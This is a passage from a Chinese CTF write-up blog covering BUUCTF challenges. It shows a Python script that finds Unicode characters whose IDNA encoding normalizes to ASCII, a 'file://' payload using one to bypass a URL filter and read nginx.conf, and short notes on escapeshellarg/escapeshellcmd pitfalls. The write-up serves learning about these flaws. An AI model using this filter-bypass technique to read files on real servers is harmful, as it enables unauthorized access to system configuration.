 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment"># coding:utf-8 </span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">128</span>,<span class="number">65537</span>):    </span><br><span class="line">    tmp=chr(i)    </span><br><span class="line">    <span class="keyword">try</span>:        </span><br><span class="line">        res = tmp.encode(<span class="string">'idna'</span>).decode(<span class="string">'utf-8'</span>)        </span><br><span class="line">        <span class="keyword">if</span>(<span class="string">"-"</span>) <span class="keyword">in</span> res:            </span><br><span class="line">            <span class="keyword">continue</span>        </span><br><span class="line">        print(<span class="string">"U:&#123;&#125;    A:&#123;&#125;      ascii:&#123;&#125; "</span>.format(tmp, res, i))    </span><br><span class="line">    <span class="keyword">except</span>:        </span><br><span class="line">        <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>
<p> <img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-11-19_10-23-32.png" alt></p>
</li>
<li><p>题目提示nginx，则可用上面这个漏洞绕过限制读取nginx配置文件<br> <code>file://suctf.c℆sr/local/nginx/conf/nginx.conf</code><br>最终得到flag。</p>
</li>
</ol>
<h1 id="BUUCTF-ONLINE-TOOL"><a href="#BUUCTF-ONLINE-TOOL" class="headerlink" title="BUUCTF-ONLINE-TOOL"></a>BUUCTF-ONLINE-TOOL</h1><ol>
<li><p>escapeshellarg和escapeshellcmd联合使用的一些问题</p>
</li>
<li><p>escapeshellarg</p>
<p> 如果字符串出现单引号就对单引号进行转义，并在单引号左右两侧加上单引号,如果没有单引号就直接给字符串两边加上单引号。</p>
</li>
<li><p>escapeshellcmd</p>
<p> 对一些特殊字符进行转义，并对没有配对的单引号进行转义。</p>
</li>
<li><p>参考</p>
<p> <a href="https://paper.seebug.org/164/" target="_blank" rel="noopener">PHP escapeshellarg()+escapeshellcmd() 之殇</a><br> <a href="https://blog.csdn.net/stepone4ward/article/details/96286479#commentBox" target="_blank" rel="noopener">BUUCTF-WP</a></p>
</li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/12/frp实现将meterpreter转发到内网msf/" rel="next" title="frp实现将meterpreter转发到内网msf">
                <i class="fa fa-chevron-left"></i> frp实现将meterpreter转发到内网msf
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/30/nmap参数备忘/" rel="prev" title="nmap参数备忘">
                nmap参数备忘 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/pikachu.jpg" alt="srat1999">
            
              <p class="site-author-name" itemprop="name">srat1999</p>
              <p class="site-description motion-element" itemprop="description">the higher you stand the more you can see</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">55</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/srat1999" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:srat1999@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#BUUCTF-0CTF-piapiapia"><span class="nav-number">1.</span> <span class="nav-text">BUUCTF-0CTF-piapiapia</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BUUCTF-CISCN2019-Dropbox"><span class="nav-number">2.</span> <span class="nav-text">BUUCTF-CISCN2019-Dropbox</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BUUCTF-EASYJava"><span class="nav-number">3.</span> <span class="nav-text">BUUCTF-EASYJava</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BUUCTF-IKUN—–JWT-PYTHON反序列化"><span class="nav-number">4.</span> <span class="nav-text">BUUCTF-IKUN—–JWT,PYTHON反序列化</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#idan编码和UTF-8编码的漏洞，可绕过网站过滤的字符串—-Buuctf-Pythonnigix"><span class="nav-number">5.</span> <span class="nav-text">idan编码和UTF-8编码的漏洞，可绕过网站过滤的字符串—-Buuctf-Pythonnigix</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BUUCTF-ONLINE-TOOL"><span class="nav-number">6.</span> <span class="nav-text">BUUCTF-ONLINE-TOOL</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">srat1999</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">70.1k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







  <div>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26online%3D1%26show%3Dline' type='text/javascript'%3E%3C/script%3E"));</script>
  </div>
 



        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
